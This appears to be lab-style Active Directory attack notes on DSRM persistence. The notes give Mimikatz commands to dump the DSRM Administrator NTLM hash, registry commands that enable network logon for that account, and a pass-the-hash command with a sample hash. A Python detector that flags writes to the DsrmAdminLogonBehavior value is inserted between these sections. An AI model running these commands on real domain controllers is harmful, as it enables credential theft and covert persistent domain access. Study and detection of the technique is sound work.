Directory Services Restore Mode (DSRM) is a Safe Mode boot option for Windows Server domain controllers; its main purpose is to let system administrators log in to the system to restore or repair the AD database.
Every domain controller has a local administrator account called "Administrator", and its password is the DSRM password.
Dump DSRM NTLM hash
Requires Domain Admin privileges.
# dumping from sam - DSRM local Administrator hash
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
# dumping from lsass - Administrator hash
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
Change Logon Behavior
In order to use the DSRM account hash, the DsrmAdminLogonBehavior registry value on the domain controller needs to be changed.
# Entering DC session
Enter-PSSession -ComputerName dcorp-dc
# Check if key exists
Get-ItemProperty 'HKLM:\System\CurrentControlSet\Control\Lsa\' -Name 'DsrmAdminLogonBehavior'
# If it exists, set its value to 2
Set-ItemProperty 'HKLM:\System\CurrentControlSet\Control\Lsa\' -Name 'DsrmAdminLogonBehavior' -Value 2 -Verbose
# If it does not exist, create it and set its value to 2
New-ItemProperty 'HKLM:\System\CurrentControlSet\Control\Lsa\' -Name 'DsrmAdminLogonBehavior' -Value 2 -PropertyType DWORD -Verbose
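From the defender's side, the registry change above is the event worth alerting on. The following Python detector is an added example (not part of the original notes): it parses constructed sample lines in the shape of Sysmon Event ID 13 (registry value set) and flags any write to DsrmAdminLogonBehavior, rating 1 or 2 as high severity; the host name dcorp-dc comes from the notes, the user and image names are made up.

```python
import re

# Meaning of the DsrmAdminLogonBehavior DWORD values.
LOGON_BEHAVIOR = {
    0: "default: DSRM account usable only when the DC is booted into DSRM",
    1: "DSRM account usable whenever the AD DS service is stopped",
    2: "DSRM account usable at any time, including for network logon",
}
TARGET = r"\Control\Lsa\DsrmAdminLogonBehavior".lower()

FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")
DWORD_RE = re.compile(r"DWORD \(0x([0-9A-Fa-f]{8})\)")

# Constructed sample events (made up for this example, not real telemetry),
# laid out as flattened Sysmon Event ID 13 records.
SAMPLE_EVENTS = [
    "EventID=13 Computer=dcorp-dc TargetObject=HKLM\\System\\CurrentControlSet\\Control\\Lsa\\DsrmAdminLogonBehavior Details=DWORD (0x00000002) Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe User=DCORP\\svcadmin",
    "EventID=13 Computer=dcorp-dc TargetObject=HKLM\\System\\CurrentControlSet\\Control\\Lsa\\LmCompatibilityLevel Details=DWORD (0x00000005) Image=C:\\Windows\\regedit.exe User=DCORP\\svcadmin",
    "EventID=13 Computer=dcorp-dc TargetObject=HKLM\\System\\CurrentControlSet\\Control\\Lsa\\DsrmAdminLogonBehavior Details=DWORD (0x00000000) Image=C:\\Windows\\regedit.exe User=DCORP\\Administrator",
]


def parse_event(line):
    """Split a 'Key=value Key=value ...' event line into a dict."""
    return dict(FIELD_RE.findall(line))


def dsrm_alerts(lines):
    """Return one alert per Event ID 13 record that writes DsrmAdminLogonBehavior.

    Values 1 and 2 widen where the DSRM account may log on and are rated high;
    a reset to 0 is kept as informational so the timeline stays complete.
    """
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "13" or not ev.get("TargetObject", "").lower().endswith(TARGET):
            continue
        m = DWORD_RE.search(ev.get("Details", ""))
        value = int(m.group(1), 16) if m else None
        alerts.append({
            "host": ev.get("Computer"), "user": ev.get("User"), "image": ev.get("Image"),
            "value": value,
            "severity": "high" if value in (1, 2) else "info",
            "meaning": LOGON_BEHAVIOR.get(value, "unexpected value"),
        })
    return alerts


if __name__ == "__main__":
    for a in dsrm_alerts(SAMPLE_EVENTS):
        print(f"[{a['severity']}] {a['host']} {a['user']} via {a['image']}: value={a['value']} ({a['meaning']})")
```

Point the same logic at Windows Security event 4657 (registry value modified, requires object auditing on the Lsa key) if Sysmon is not deployed.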
Passing the hash
# /domain - the domain controller
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"'
# Check if it worked
ls \\dcorp-dc\C$